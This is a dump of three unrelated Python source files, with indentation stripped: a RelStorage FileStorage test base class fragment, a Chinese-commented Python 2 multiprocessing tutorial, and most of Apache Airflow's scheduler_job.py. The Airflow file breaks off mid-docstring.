# A base class of BasicRecoveryStorage
# We rely on being placed in a temporary directory by a super
# class that will be cleaned up by tearDown().
def setUp(self):
super(AbstractToFileStorage, self).setUp()
# Use the abspath so that even if we close it after
# we've returned to our original directory (e.g.,
# close is run as part of addCleanup(), which happens after
# tearDown) we don't write index files into the original directory.
self._dst_path = os.path.abspath(self.rs_temp_prefix + 'Dest.fs')
self.__dst = None
@property
def _dst(self):
if self.__dst is None:
self.__dst = FileStorage(self._dst_path, create=True)
# On Windows, though, this could be too late: We can't remove
# files that are still open, and zope.testing.setupstack
# was asked to remove the temp dir as part of tearing itself down;
# cleanups run after tearDown runs (which is when the setupstack runs.)
self.addCleanup(_close_and_clean_storage, self.__dst)
return self.__dst
def tearDown(self):
if hasattr(self.__dst, 'close'):
_close_and_clean_storage(self.__dst)
self.__dst = 42 # Not none so we don't try to create.
super(AbstractToFileStorage, self).tearDown()
def new_dest(self):
return self._closing(FileStorage(self._dst_path))
class AbstractFromFileStorage(RelStorageTestBase):
# As for AbstractToFileStorage
def setUp(self):
super(AbstractFromFileStorage, self).setUp()
self._src_path = os.path.abspath(self.rs_temp_prefix + 'Source.fs')
self.__dst = None
def make_storage_to_cache(self):
return FileStorage(self._src_path, create=True)
@property
def _dst(self):
if self.__dst is None:
self.__dst = self.make_storage()
self.addCleanup(_close_and_clean_storage, self.__dst)
return self.__dst
def tearDown(self):
if hasattr(self.__dst, 'close'):
_close_and_clean_storage(self.__dst)
self.__dst = 42 # Not none so we don't try to create.
super(AbstractFromFileStorage, self).tearDown()
def new_dest(self):
return self._dst
|
ProcessChapter9.py
|
# encoding:UTF-8
import os
import random
import time
from multiprocessing import Process, Pool, Queue
__author__ = 'Hope6537'
# multiprocessing模块提供了一个Process类来代表一个进程对象,下面的例子演示了启动一个子进程并等待其结束:
def run_proc(name):
print 'Run child process %s (%s)...' % (name, os.getpid())
if __name__ == '__main__':
print 'Parent process %s.' % os.getpid()
# 创建进程对象
p = Process(target=run_proc, args=('test',))
print 'Process will start.'
p.start()
# 相当于同步,等待子进程结束后再接着运行
p.join()
print 'Process end.'
# 如果需要启动大量的子进程,那么进程池走你
def long_time_task(name):
print 'Run task %s (%s)...' % (name, os.getpid())
start = time.time()
time.sleep(random.random() * 3)
end = time.time()
print 'Task %s runs %0.2f seconds.' % (name, (end - start))
# 请注意输出的结果,task 0,1,2,3是立刻执行的,而task 4要等待前面某个task完成后才执行,
# 这是因为Pool的默认大小在我的电脑上是4,因此,最多同时执行4个进程。这是Pool有意设计的限制,并不是操作系统的限制
if __name__ == '__main__':
print 'Parent process %s.' % os.getpid()
# 在这里设定最多可以执行子进程的数量
p = Pool(2)
for i in range(5):
p.apply_async(long_time_task, args=(i,))
print 'Waiting for all subprocesses done...'
# 关闭池
p.close()
# 等待完成
p.join()
print 'All subprocesses done.'
# Process之间肯定是需要通信的,操作系统提供了很多机制来实现进程间的通信。
# Python的multiprocessing模块包装了底层的机制,提供了Queue队列、Pipes管道等多种方式来交换数据。
# 写数据进程执行的代码:
def write(q):
for value in ['A', 'B', 'C']:
print 'Put %s to queue...' % value
q.put(value)
time.sleep(random.random())
# 读数据进程执行的代码:
def read(q):
while True:
value = q.get(True)
print 'Get %s from queue.' % value
# multiprocessing需要“模拟”出fork的效果,父进程所有Python对象都必须通过pickle序列化再传到子进程去
# 所有,如果multiprocessing在Windows下调用失败了,要先考虑是不是pickle失败了。
if __name__ == '__main__':
# 父进程创建Queue,并传给各个子进程:
q = Queue()
pw = Process(target=write, args=(q,))
pr = Process(target=read, args=(q,))
# 启动子进程pw,写入:
pw.start()
# 启动子进程pr,读取:
pr.start()
# 等待pw结束:
pw.join()
# pr进程里是死循环,无法等待其结束,只能强行终止:
pr.terminate()
|
scheduler_job.py
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import logging
import multiprocessing
import os
import signal
import sys
import threading
import time
from collections import defaultdict
from contextlib import redirect_stderr, redirect_stdout
from datetime import timedelta
from time import sleep
from typing import List, Set
from setproctitle import setproctitle
from sqlalchemy import and_, func, not_, or_
from sqlalchemy.orm.session import make_transient
from airflow import models, settings
from airflow.configuration import conf
from airflow.exceptions import AirflowException
from airflow.executors.local_executor import LocalExecutor
from airflow.executors.sequential_executor import SequentialExecutor
from airflow.jobs.base_job import BaseJob
from airflow.models import DAG, DagRun, SlaMiss, errors
from airflow.models.taskinstance import SimpleTaskInstance
from airflow.stats import Stats
from airflow.ti_deps.dep_context import SCHEDULEABLE_STATES, SCHEDULED_DEPS, DepContext
from airflow.ti_deps.deps.pool_slots_available_dep import STATES_TO_COUNT_AS_RUNNING
from airflow.utils import asciiart, helpers, timezone
from airflow.utils.dag_processing import (
AbstractDagFileProcessorProcess, DagFileProcessorAgent, SimpleDag, SimpleDagBag,
)
from airflow.utils.db import provide_session
from airflow.utils.email import get_email_address_list, send_email
from airflow.utils.file import list_py_file_paths
from airflow.utils.log.logging_mixin import LoggingMixin, StreamLogWriter, set_context
from airflow.utils.state import State
class DagFileProcessorProcess(AbstractDagFileProcessorProcess, LoggingMixin):
"""Runs DAG processing in a separate process using DagFileProcessor
:param file_path: a Python file containing Airflow DAG definitions
:type file_path: str
:param pickle_dags: whether to serialize the DAG objects to the DB
:type pickle_dags: bool
:param dag_id_white_list: If specified, only look at these DAG ID's
:type dag_id_white_list: List[str]
:param zombies: zombie task instances to kill
:type zombies: List[airflow.models.taskinstance.SimpleTaskInstance]
"""
# Counter that increments every time an instance of this class is created
class_creation_counter = 0
def __init__(self, file_path, pickle_dags, dag_id_white_list, zombies):
self._file_path = file_path
# The process that was launched to process the given .
self._process = None
self._dag_id_white_list = dag_id_white_list
self._pickle_dags = pickle_dags
self._zombies = zombies
# The result of Scheduler.process_file(file_path).
self._result = None
# Whether the process is done running.
self._done = False
# When the process started.
self._start_time = None
# This ID is use to uniquely name the process / thread that's launched
# by this processor instance
self._instance_id = DagFileProcessorProcess.class_creation_counter
DagFileProcessorProcess.class_creation_counter += 1
@property
def file_path(self):
return self._file_path
@staticmethod
def _run_file_processor(result_channel,
file_path,
pickle_dags,
dag_id_white_list,
thread_name,
zombies):
"""
Process the given file.
:param result_channel: the connection to use for passing back the result
:type result_channel: multiprocessing.Connection
:param file_path: the file to process
:type file_path: str
:param pickle_dags: whether to pickle the DAGs found in the file and
save them to the DB
:type pickle_dags: bool
:param dag_id_white_list: if specified, only examine DAG ID's that are
in this list
:type dag_id_white_list: list[str]
:param thread_name: the name to use for the process that is launched
:type thread_name: str
:param zombies: zombie task instances to kill
:type zombies: list[airflow.models.taskinstance.SimpleTaskInstance]
:return: the process that was launched
:rtype: multiprocessing.Process
"""
# This helper runs in the newly created process
log = logging.getLogger("airflow.processor")
set_context(log, file_path)
setproctitle("airflow scheduler - DagFileProcessor {}".format(file_path))
try:
# redirect stdout/stderr to log
with redirect_stdout(StreamLogWriter(log, logging.INFO)),\
redirect_stderr(StreamLogWriter(log, logging.WARN)):
# Re-configure the ORM engine as there are issues with multiple processes
settings.configure_orm()
# Change the thread name to differentiate log lines. This is
# really a separate process, but changing the name of the
# process doesn't work, so changing the thread name instead.
threading.current_thread().name = thread_name
start_time = time.time()
log.info("Started process (PID=%s) to work on %s", os.getpid(), file_path)
dag_file_processor = DagFileProcessor(dag_ids=dag_id_white_list, log=log)
result = dag_file_processor.process_file(
file_path=file_path,
zombies=zombies,
pickle_dags=pickle_dags
)
result_channel.send(result)
end_time = time.time()
log.info(
"Processing %s took %.3f seconds", file_path, end_time - start_time
)
except Exception:
# Log exceptions through the logging framework.
log.exception("Got an exception! Propagating...")
raise
finally:
result_channel.close()
# We re-initialized the ORM within this Process above so we need to
# tear it down manually here
settings.dispose_orm()
def start(self):
"""
Launch the process and start processing the DAG.
"""
self._parent_channel, _child_channel = multiprocessing.Pipe()
self._process = multiprocessing.Process(
target=type(self)._run_file_processor,
args=(
_child_channel,
self.file_path,
self._pickle_dags,
self._dag_id_white_list,
"DagFileProcessor{}".format(self._instance_id),
self._zombies
),
name="DagFileProcessor{}-Process".format(self._instance_id)
)
self._start_time = timezone.utcnow()
self._process.start()
def kill(self):
"""
Kill the process launched to process the file, and ensure consistent state.
"""
if self._process is None:
raise AirflowException("Tried to kill before starting!")
# The queue will likely get corrupted, so remove the reference
self._result_queue = None
self._kill_process()
def terminate(self, sigkill=False):
"""
Terminate (and then kill) the process launched to process the file.
:param sigkill: whether to issue a SIGKILL if SIGTERM doesn't work.
:type sigkill: bool
"""
if self._process is None:
raise AirflowException("Tried to call terminate before starting!")
self._process.terminate()
# Arbitrarily wait 5s for the process to die
self._process.join(5)
if sigkill:
self._kill_process()
self._parent_channel.close()
def _kill_process(self):
if self._process.is_alive():
self.log.warning("Killing PID %s", self._process.pid)
os.kill(self._process.pid, signal.SIGKILL)
@property
def pid(self):
"""
:return: the PID of the process launched to process the given file
:rtype: int
"""
if self._process is None:
raise AirflowException("Tried to get PID before starting!")
return self._process.pid
@property
def exit_code(self):
"""
After the process is finished, this can be called to get the return code
:return: the exit code of the process
:rtype: int
"""
if not self._done:
raise AirflowException("Tried to call retcode before process was finished!")
return self._process.exitcode
@property
def done(self):
"""
Check if the process launched to process this file is done.
:return: whether the process is finished running
:rtype: bool
"""
if self._process is None:
raise AirflowException("Tried to see if it's done before starting!")
if self._done:
return True
if self._parent_channel.poll():
try:
self._result = self._parent_channel.recv()
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
except EOFError:
pass
if not self._process.is_alive():
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
return False
@property
def result(self):
"""
:return: result of running SchedulerJob.process_file()
:rtype: airflow.utils.dag_processing.SimpleDag
"""
if not self.done:
raise AirflowException("Tried to get the result before it's done!")
return self._result
@property
def start_time(self):
"""
:return: when this started to process the file
:rtype: datetime
"""
if self._start_time is None:
raise AirflowException("Tried to get start time before it started!")
return self._start_time
class DagFileProcessor(LoggingMixin):
"""
Process a Python file containing Airflow DAGs.
This includes:
1. Execute the file and look for DAG objects in the namespace.
2. Pickle the DAG and save it to the DB (if necessary).
3. For each DAG, see what tasks should run and create appropriate task
instances in the DB.
4. Record any errors importing the file into ORM
5. Kill (in ORM) any task instances belonging to the DAGs that haven't
issued a heartbeat in a while.
Returns a list of SimpleDag objects that represent the DAGs found in
the file
:param dag_ids: If specified, only look at these DAG ID's
:type dag_ids: List[str]
:param log: Logger to save the processing process
:type log: logging.Logger
"""
def __init__(self, dag_ids, log):
self.dag_ids = dag_ids
self._log = log
@provide_session
def manage_slas(self, dag, session=None):
"""
Finding all tasks that have SLAs defined, and sending alert emails
where needed. New SLA misses are also recorded in the database.
We are assuming that the scheduler runs often, so we only check for
tasks that should have succeeded in the past hour.
"""
if not any([isinstance(ti.sla, timedelta) for ti in dag.tasks]):
self.log.info("Skipping SLA check for %s because no tasks in DAG have SLAs", dag)
return
TI = models.TaskInstance
sq = (
session
.query(
TI.task_id,
func.max(TI.execution_date).label('max_ti')
)
.with_hint(TI, 'USE INDEX (PRIMARY)', dialect_name='mysql')
.filter(TI.dag_id == dag.dag_id)
.filter(
or_(
TI.state == State.SUCCESS,
TI.state == State.SKIPPED
)
)
.filter(TI.task_id.in_(dag.task_ids))
.group_by(TI.task_id).subquery('sq')
)
max_tis = session.query(TI).filter(
TI.dag_id == dag.dag_id,
TI.task_id == sq.c.task_id,
TI.execution_date == sq.c.max_ti,
).all()
ts = timezone.utcnow()
for ti in max_tis:
task = dag.get_task(ti.task_id)
dttm = ti.execution_date
if isinstance(task.sla, timedelta):
dttm = dag.following_schedule(dttm)
while dttm < timezone.utcnow():
following_schedule = dag.following_schedule(dttm)
if following_schedule + task.sla < timezone.utcnow():
session.merge(SlaMiss(
task_id=ti.task_id,
dag_id=ti.dag_id,
execution_date=dttm,
timestamp=ts))
dttm = dag.following_schedule(dttm)
session.commit()
slas = (
session
.query(SlaMiss)
.filter(SlaMiss.notification_sent == False, SlaMiss.dag_id == dag.dag_id) # noqa pylint: disable=singleton-comparison
.all()
)
if slas:
sla_dates = [sla.execution_date for sla in slas]
qry = (
session
.query(TI)
.filter(
TI.state != State.SUCCESS,
TI.execution_date.in_(sla_dates),
TI.dag_id == dag.dag_id
).all()
)
blocking_tis = []
for ti in qry:
if ti.task_id in dag.task_ids:
ti.task = dag.get_task(ti.task_id)
blocking_tis.append(ti)
else:
session.delete(ti)
session.commit()
task_list = "\n".join([
sla.task_id + ' on ' + sla.execution_date.isoformat()
for sla in slas])
blocking_task_list = "\n".join([
ti.task_id + ' on ' + ti.execution_date.isoformat()
for ti in blocking_tis])
# Track whether email or any alert notification sent
# We consider email or the alert callback as notifications
email_sent = False
notification_sent = False
if dag.sla_miss_callback:
# Execute the alert callback
self.log.info(' --------------> ABOUT TO CALL SLA MISS CALL BACK ')
try:
dag.sla_miss_callback(dag, task_list, blocking_task_list, slas,
blocking_tis)
notification_sent = True
except Exception:
self.log.exception("Could not call sla_miss_callback for DAG %s",
dag.dag_id)
email_content = """\
Here's a list of tasks that missed their SLAs:
<pre><code>{task_list}\n<code></pre>
Blocking tasks:
<pre><code>{blocking_task_list}\n{bug}<code></pre>
""".format(task_list=task_list, blocking_task_list=blocking_task_list,
bug=asciiart.bug)
tasks_missed_sla = [dag.get_task(sla.task_id) for sla in slas]
emails = set()
for task in tasks_missed_sla:
if task.email:
if isinstance(task.email, str):
emails |= set(get_email_address_list(task.email))
elif isinstance(task.email, (list, tuple)):
emails |= set(task.email)
if emails:
try:
send_email(
emails,
"[airflow] SLA miss on DAG=" + dag.dag_id,
email_content)
email_sent = True
notification_sent = True
except Exception:
self.log.exception("Could not send SLA Miss email notification for"
" DAG %s", dag.dag_id)
# If we sent any notification, update the sla_miss table
if notification_sent:
for sla in slas:
if email_sent:
sla.email_sent = True
sla.notification_sent = True
session.merge(sla)
session.commit()
@staticmethod
def update_import_errors(session, dagbag):
"""
For the DAGs in the given DagBag, record any associated import errors and clears
errors for files that no longer have them. These are usually displayed through the
Airflow UI so that users know that there are issues parsing DAGs.
:param session: session for ORM operations
:type session: sqlalchemy.orm.session.Session
:param dagbag: DagBag containing DAGs with import errors
:type dagbag: airflow.models.DagBag
"""
# Clear the errors of the processed files
for dagbag_file in dagbag.file_last_changed:
session.query(errors.ImportError).filter(
errors.ImportError.filename == dagbag_file
).delete()
# Add the errors of the processed files
for filename, stacktrace in dagbag.import_errors.items():
session.add(errors.ImportError(
filename=filename,
stacktrace=stacktrace))
session.commit()
@provide_session
def create_dag_run(self, dag, session=None):
"""
This method checks whether a new DagRun needs to be created
for a DAG based on scheduling interval.
Returns DagRun if one is scheduled. Otherwise returns None.
"""
if dag.schedule_interval and conf.getboolean('scheduler', 'USE_JOB_SCHEDULE'):
active_runs = DagRun.find(
dag_id=dag.dag_id,
state=State.RUNNING,
external_trigger=False,
session=session
)
# return if already reached maximum active runs and no timeout setting
if len(active_runs) >= dag.max_active_runs and not dag.dagrun_timeout:
return
timedout_runs = 0
for dr in active_runs:
if (
dr.start_date and dag.dagrun_timeout and
dr.start_date < timezone.utcnow() - dag.dagrun_timeout
):
dr.state = State.FAILED
dr.end_date = timezone.utcnow()
dag.handle_callback(dr, success=False, reason='dagrun_timeout',
session=session)
timedout_runs += 1
session.commit()
if len(active_runs) - timedout_runs >= dag.max_active_runs:
return
# this query should be replaced by find dagrun
qry = (
session.query(func.max(DagRun.execution_date))
.filter_by(dag_id=dag.dag_id)
.filter(or_(
DagRun.external_trigger == False, # noqa: E712 pylint: disable=singleton-comparison
# add % as a wildcard for the like query
DagRun.run_id.like(DagRun.ID_PREFIX + '%')
)
)
)
last_scheduled_run = qry.scalar()
# don't schedule @once again
if dag.schedule_interval == '@once' and last_scheduled_run:
return None
# don't do scheduler catchup for dag's that don't have dag.catchup = True
if not (dag.catchup or dag.schedule_interval == '@once'):
# The logic is that we move start_date up until
# one period before, so that timezone.utcnow() is AFTER
# the period end, and the job can be created...
now = timezone.utcnow()
next_start = dag.following_schedule(now)
last_start = dag.previous_schedule(now)
if next_start <= now:
new_start = last_start
else:
new_start = dag.previous_schedule(last_start)
if dag.start_date:
if new_start >= dag.start_date:
dag.start_date = new_start
else:
dag.start_date = new_start
next_run_date = None
if not last_scheduled_run:
# First run
task_start_dates = [t.start_date for t in dag.tasks]
if task_start_dates:
next_run_date = dag.normalize_schedule(min(task_start_dates))
self.log.debug(
"Next run date based on tasks %s",
next_run_date
)
else:
next_run_date = dag.following_schedule(last_scheduled_run)
# make sure backfills are also considered
last_run = dag.get_last_dagrun(session=session)
if last_run and next_run_date:
while next_run_date <= last_run.execution_date:
next_run_date = dag.following_schedule(next_run_date)
# don't ever schedule prior to the dag's start_date
if dag.start_date:
next_run_date = (dag.start_date if not next_run_date
else max(next_run_date, dag.start_date))
if next_run_date == dag.start_date:
next_run_date = dag.normalize_schedule(dag.start_date)
self.log.debug(
"Dag start date: %s. Next run date: %s",
dag.start_date, next_run_date
)
# don't ever schedule in the future or if next_run_date is None
if not next_run_date or next_run_date > timezone.utcnow():
return
# this structure is necessary to avoid a TypeError from concatenating
# NoneType
if dag.schedule_interval == '@once':
period_end = next_run_date
elif next_run_date:
period_end = dag.following_schedule(next_run_date)
# Don't schedule a dag beyond its end_date (as specified by the dag param)
if next_run_date and dag.end_date and next_run_date > dag.end_date:
return
# Don't schedule a dag beyond its end_date (as specified by the task params)
# Get the min task end date, which may come from the dag.default_args
min_task_end_date = []
task_end_dates = [t.end_date for t in dag.tasks if t.end_date]
if task_end_dates:
min_task_end_date = min(task_end_dates)
if next_run_date and min_task_end_date and next_run_date > min_task_end_date:
return
if next_run_date and period_end and period_end <= timezone.utcnow():
next_run = dag.create_dagrun(
run_id=DagRun.ID_PREFIX + next_run_date.isoformat(),
execution_date=next_run_date,
start_date=timezone.utcnow(),
state=State.RUNNING,
external_trigger=False
)
return next_run
@provide_session
def _process_task_instances(self, dag, task_instances_list, session=None):
"""
This method schedules the tasks for a single DAG by looking at the
active DAG runs and adding task instances that should run to the
queue.
"""
# update the state of the previously active dag runs
dag_runs = DagRun.find(dag_id=dag.dag_id, state=State.RUNNING, session=session)
active_dag_runs = []
for run in dag_runs:
self.log.info("Examining DAG run %s", run)
# don't consider runs that are executed in the future
if run.execution_date > timezone.utcnow():
self.log.error(
"Execution date is in future: %s",
run.execution_date
)
continue
if len(active_dag_runs) >= dag.max_active_runs:
self.log.info("Number of active dag runs reached max_active_run.")
break
# skip backfill dagruns for now as long as they are not really scheduled
if run.is_backfill:
continue
# todo: run.dag is transient but needs to be set
run.dag = dag
# todo: preferably the integrity check happens at dag collection time
run.verify_integrity(session=session)
run.update_state(session=session)
if run.state == State.RUNNING:
make_transient(run)
active_dag_runs.append(run)
for run in active_dag_runs:
self.log.debug("Examining active DAG run: %s", run)
tis = run.get_task_instances(state=SCHEDULEABLE_STATES)
# this loop is quite slow as it uses are_dependencies_met for
# every task (in ti.is_runnable). This is also called in
# update_state above which has already checked these tasks
for ti in tis:
task = dag.get_task(ti.task_id)
# fixme: ti.task is transient but needs to be set
ti.task = task
if ti.are_dependencies_met(
dep_context=DepContext(flag_upstream_failed=True),
session=session
):
self.log.debug('Queuing task: %s', ti)
task_instances_list.append(ti.key)
def _process_dags(self, dagbag, dags, tis_out):
"""
Iterates over the dags and processes them. Processing includes:
1. Create appropriate DagRun(s) in the DB.
2. Create appropriate TaskInstance(s) in the DB.
3. Send emails for tasks that have missed SLAs.
:param dagbag: a collection of DAGs to process
:type dagbag: airflow.models.DagBag
:param dags: the DAGs from the DagBag to process
:type dags: airflow.models.DAG
:param tis_out: A list to add generated TaskInstance objects
:type tis_out: list[TaskInstance]
:rtype: None
"""
for dag in dags:
dag = dagbag.get_dag(dag.dag_id)
if not dag:
self.log.error("DAG ID %s was not found in the DagBag", dag.dag_id)
continue
if dag.is_paused:
self.log.info("Not processing DAG %s since it's paused", dag.dag_id)
continue
self.log.info("Processing %s", dag.dag_id)
# Only creates DagRun for DAGs that are not subdag since
# DagRun of subdags are created when SubDagOperator executes.
if not dag.is_subdag:
dag_run = self.create_dag_run(dag)
if dag_run:
expected_start_date = dag.following_schedule(dag_run.execution_date)
if expected_start_date:
schedule_delay = dag_run.start_date - expected_start_date
Stats.timing(
'dagrun.schedule_delay.{dag_id}'.format(dag_id=dag.dag_id),
schedule_delay)
self.log.info("Created %s", dag_run)
self._process_task_instances(dag, tis_out)
self.manage_slas(dag)
def _find_dags_to_process(self, dags: List[DAG], paused_dag_ids: Set[str]):
"""
Find the DAGs that are not paused to process.
:param dags: specified DAGs
:param paused_dag_ids: paused DAG IDs
:return: DAGs to process
"""
if len(self.dag_ids) > 0:
dags = [dag for dag in dags
if dag.dag_id in self.dag_ids and
dag.dag_id not in paused_dag_ids]
else:
dags = [dag for dag in dags
if dag.dag_id not in paused_dag_ids]
return dags
@provide_session
def process_file(self, file_path, zombies, pickle_dags=False, session=None):
"""
Process a Python file containing Airflow DAGs.
This includes:
1. Execute the file and look for DAG objects in the namespace.
2. Pickle the DAG and save it to the DB (if necessary).
3. For each DAG, see what tasks should run and create appropriate task
instances in the DB.
4. Record any errors importing the file into ORM
5. Kill (in ORM) any task instances belonging to the DAGs that haven't
issued a heartbeat in a while.
Returns a list of SimpleDag objects that represent the DAGs found in
the file
:param file_path: the path to the Python file that should be executed
:type file_path: str
:param zombies: zombie task instances to kill.
:type zombies: List[airflow.models.taskinstance.SimpleTaskInstance]
:param pickle_dags: whether serialize the DAGs found in the file and
save them to the db
:type pickle_dags: bool
:return: a list of SimpleDags made from the Dags found in the file
:rtype: List[airflow.utils.dag_processing.SimpleDagBag]
"""
self.log.info("Processing file %s for tasks to queue", file_path)
# As DAGs are parsed from this file, they will be converted into SimpleDags
simple_dags = []
try:
dagbag = models.DagBag(file_path, include_examples=False)
except Exception:
self.log.exception("Failed at reloading the DAG file %s", file_path)
Stats.incr('dag_file_refresh_error', 1, 1)
return [], []
if len(dagbag.dags) > 0:
self.log.info("DAG(s) %s retrieved from %s", dagbag.dags.keys(), file_path)
else:
self.log.warning("No viable dags retrieved from %s", file_path)
self.update_import_errors(session, dagbag)
return [], len(dagbag.import_errors)
# Save individual DAGs in the ORM and update DagModel.last_scheduled_time
for dag in dagbag.dags.values():
dag.sync_to_db()
paused_dag_ids = {dag.dag_id for dag in dagbag.dags.values() if dag.is_paused}
# Pickle the DAGs (if necessary) and put them into a SimpleDag
for dag_id in dagbag.dags:
# Only return DAGs that are not paused
if dag_id not in paused_dag_ids:
dag = dagbag.get_dag(dag_id)
pickle_id = None
if pickle_dags:
pickle_id = dag.pickle(session).id
simple_dags.append(SimpleDag(dag, pickle_id=pickle_id))
dags = self._find_dags_to_process(dagbag.dags.values(), paused_dag_ids)
# Not using multiprocessing.Queue() since it's no longer a separate
# process and due to some unusual behavior. (empty() incorrectly
# returns true as described in https://bugs.python.org/issue23582 )
ti_keys_to_schedule = []
self._process_dags(dagbag, dags, ti_keys_to_schedule)
for ti_key in ti_keys_to_schedule:
dag = dagbag.dags[ti_key[0]]
task = dag.get_task(ti_key[1])
ti = models.TaskInstance(task, ti_key[2])
ti.refresh_from_db(session=session, lock_for_update=True)
# We check only deps needed to set TI to SCHEDULED state here.
# Deps needed to set TI to QUEUED state will be batch checked later
# by the scheduler for better performance.
dep_context = DepContext(deps=SCHEDULED_DEPS, ignore_task_deps=True)
# Only schedule tasks that have their dependencies met, e.g. to avoid
# a task that recently got its state changed to RUNNING from somewhere
# other than the scheduler from getting its state overwritten.
if ti.are_dependencies_met(
dep_context=dep_context,
session=session,
verbose=True
):
# Task starts out in the scheduled state. All tasks in the
# scheduled state will be sent to the executor
ti.state = State.SCHEDULED
# Also save this task instance to the DB.
self.log.info("Creating / updating %s in ORM", ti)
session.merge(ti)
# commit batch
session.commit()
# Record import errors into the ORM
try:
self.update_import_errors(session, dagbag)
except Exception:
self.log.exception("Error logging import errors!")
try:
dagbag.kill_zombies(zombies)
except Exception:
self.log.exception("Error killing zombies!")
return simple_dags, len(dagbag.import_errors)
class SchedulerJob(BaseJob):
"""
This SchedulerJob runs for a specific time interval and schedules the jobs
that are ready to run. It figures out the latest runs for each
task and sees if the dependencies for the next schedules are met.
If so, it creates appropriate TaskInstances and sends run commands to the
executor. It does this for each task in each DAG and repeats.
:param dag_id: if specified, only schedule tasks with this DAG ID
:type dag_id: str
:param dag_ids: if specified, only schedule tasks with these DAG IDs
:type dag_ids: list[str]
:param subdir: directory containing Python files with Airflow DAG
definitions, or a specific path to a file
:type subdir: str
:param num_runs: The number of times to try to schedule each DAG file.
-1 for unlimited times.
:type num_runs: int
:param processor_poll_interval: The number of seconds to wait between
polls of running processors
:type processor_poll_interval: int
:param do_pickle: once a DAG object is obtained by executing the Python
file, whether to serialize the DAG object to the DB
:type do_pickle: bool
"""
__mapper_args__ = {
'polymorphic_identity': 'SchedulerJob'
}
heartrate = conf.getint('scheduler', 'SCHEDULER_HEARTBEAT_SEC')
def __init__(
self,
dag_id=None,
dag_ids=None,
subdir=settings.DAGS_FOLDER,
num_runs=conf.getint('scheduler', 'num_runs'),
processor_poll_interval=conf.getfloat('scheduler', 'processor_poll_interval'),
do_pickle=False,
log=None,
*args, **kwargs):
# for BaseJob compatibility
self.dag_id = dag_id
self.dag_ids = [dag_id] if dag_id else []
if dag_ids:
self.dag_ids.extend(dag_ids)
self.subdir = subdir
self.num_runs = num_runs
self._processor_poll_interval = processor_poll_interval
self.do_pickle = do_pickle
super().__init__(*args, **kwargs)
self.max_threads = conf.getint('scheduler', 'max_threads')
if log:
self._log = log
self.using_sqlite = False
if 'sqlite' in conf.get('core', 'sql_alchemy_conn'):
self.using_sqlite = True
self.max_tis_per_query = conf.getint('scheduler', 'max_tis_per_query')
self.processor_agent = None
signal.signal(signal.SIGINT, self._exit_gracefully)
signal.signal(signal.SIGTERM, self._exit_gracefully)
def _exit_gracefully(self, signum, frame):
"""
Helper method to clean up processor_agent to avoid leaving orphan processes.
"""
self.log.info("Exiting gracefully upon receiving signal %s", signum)
if self.processor_agent:
self.processor_agent.end()
sys.exit(os.EX_OK)
def is_alive(self, grace_multiplier=None):
"""
Is this SchedulerJob alive?
We define alive as in a state of running and a heartbeat within the
threshold defined in the ``scheduler_health_check_threshold`` config
setting.
``grace_multiplier`` is accepted for compatibility with the parent class.
:rtype: boolean
"""
if grace_multiplier is not None:
# Accept the same behaviour as superclass
return super().is_alive(grace_multiplier=grace_multiplier)
scheduler_health_check_threshold = conf.getint('scheduler', 'scheduler_health_check_threshold')
return (
self.state == State.RUNNING and
(timezone.utcnow() - self.latest_heartbeat).seconds < scheduler_health_check_threshold
)
@provide_session
def _change_state_for_tis_without_dagrun(self,
simple_dag_bag,
old_states,
new_state,
session=None):
"""
For all DAG IDs in the SimpleDagBag, look for task instances in the
old_states and set them to new_state if the corresponding DagRun
does not exist or exists but is not in the running state. This
normally should not happen, but it can if the state of DagRuns are
changed manually.
:param old_states: examine TaskInstances in this state
:type old_states: list[airflow.utils.state.State]
:param new_state: set TaskInstances to this state
:type new_state: airflow.utils.state.State
:param simple_dag_bag: TaskInstances associated with DAGs in the
simple_dag_bag and with states in the old_states will be examined
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
"""
tis_changed = 0
query = session \
.query(models.TaskInstance) \
.outerjoin(models.DagRun, and_(
models.TaskInstance.dag_id == models.DagRun.dag_id,
models.TaskInstance.execution_date == models.DagRun.execution_date)) \
.filter(models.TaskInstance.dag_id.in_(simple_dag_bag.dag_ids)) \
.filter(models.TaskInstance.state.in_(old_states)) \
.filter(or_(
models.DagRun.state != State.RUNNING,
models.DagRun.state.is_(None)))
if self.using_sqlite:
tis_to_change = query \
.with_for_update() \
.all()
for ti in tis_to_change:
ti.set_state(new_state, session=session)
tis_changed += 1
else:
subq = query.subquery()
tis_changed = session \
.query(models.TaskInstance) \
.filter(and_(
models.TaskInstance.dag_id == subq.c.dag_id,
models.TaskInstance.task_id == subq.c.task_id,
models.TaskInstance.execution_date ==
subq.c.execution_date)) \
.update({models.TaskInstance.state: new_state},
synchronize_session=False)
session.commit()
if tis_changed > 0:
self.log.warning(
"Set %s task instances to state=%s as their associated DagRun was not in RUNNING state",
tis_changed, new_state
)
Stats.gauge('scheduler.tasks.without_dagrun', tis_changed)
@provide_session
def __get_concurrency_maps(self, states, session=None):
"""
Get the concurrency maps.
:param states: List of states to query for
:type states: list[airflow.utils.state.State]
:return: A map from (dag_id, task_id) to # of task instances and
a map from (dag_id, task_id) to # of task instances in the given state list
:rtype: dict[tuple[str, str], int]
"""
TI = models.TaskInstance
ti_concurrency_query = (
session
.query(TI.task_id, TI.dag_id, func.count('*'))
.filter(TI.state.in_(states))
.group_by(TI.task_id, TI.dag_id)
).all()
dag_map = defaultdict(int)
task_map = defaultdict(int)
for result in ti_concurrency_query:
task_id, dag_id, count = result
dag_map[dag_id] += count
task_map[(dag_id, task_id)] = count
return dag_map, task_map
@provide_session
def _find_executable_task_instances(self, simple_dag_bag, states, session=None):
"""
Finds TIs that are ready for execution with respect to pool limits,
dag concurrency, executor state, and priority.
:param simple_dag_bag: TaskInstances associated with DAGs in the
simple_dag_bag will be fetched from the DB and executed
